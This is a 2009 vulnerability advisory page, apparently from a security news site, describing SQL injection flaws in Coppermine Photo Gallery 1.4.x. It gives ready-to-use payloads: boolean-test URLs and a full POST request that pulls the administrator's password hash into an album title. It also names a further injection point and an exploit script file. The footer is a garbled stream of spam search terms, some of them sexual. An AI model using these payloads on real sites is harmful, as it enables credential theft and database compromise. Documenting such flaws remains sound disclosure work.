about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Coppermine Photo Gallery Multiple SQL Injection Vulnerabilities


Title Coppermine Photo Gallery Multiple SQL Injection Vulnerabilities
Published 2009-05-18-12:00AM
Updated 2009-05-19-10:30PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  girex
Vulnerable  Coppermine Photo Gallery 1.4.22
Coppermine Photo Gallery 1.4.21
Coppermine Photo Gallery 1.4.20
Coppermine Photo Gallery 1.4.18
Coppermine Photo Gallery 1.4.17
Coppermine Photo Gallery 1.4.16
Coppermine Photo Gallery 1.4.15
Coppermine Photo Gallery 1.4.14
Coppermine Photo Gallery 1.4.13
Coppermine Photo Gallery 1.4.12
Coppermine Photo Gallery 1.4.11
Coppermine Photo Gallery 1.4.10
Coppermine Photo Gallery 1.4.9
Coppermine Photo Gallery 1.4.4
Coppermine Photo Gallery 1.4.3
Coppermine Photo Gallery 1.4.2
Coppermine Photo Gallery 1.4
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example data, URIs and exploit are available:http://www.example.com/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=1%23 true
http://www.example.com/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=2%23 falsePOST /[path]/db_input.php HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Cookie: [your_cookies]
Content-Type: application/x-www-form-urlencodedevent=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23http://www.example.com/[path]/displayecard.php?data=[$injection] HTTP/1.1
  • /data/vulnerabilities/exploits/35009.pl
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Wed, 25 Nov 2009 14:21:40 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    www .asian 200 /compo www.htshui www.dslrdv nude pic a indian mas baike.baid baike.baid okij shoutcast Www.Wwesex www.tkyxgl 200 /compo tamilbluef Friendster juqu8.com iipibiloli 200 /compo fc1 WWW.DOGFUC W.trishavi news+for+c asp login Www.sexy.v 2.4.20-6 www.sublim PHP Remote blueflime remot%252B Rally v news for c les videos Seks india Videosexyg www.47cb.c hbzkb.net www.csfwjs rsh Saniamirza www.2008sf Videosex a esrv u ww.89.cm// apw www.pybmw. news+for+c CVE-2006-3 4327654565 freeonline Www sexvid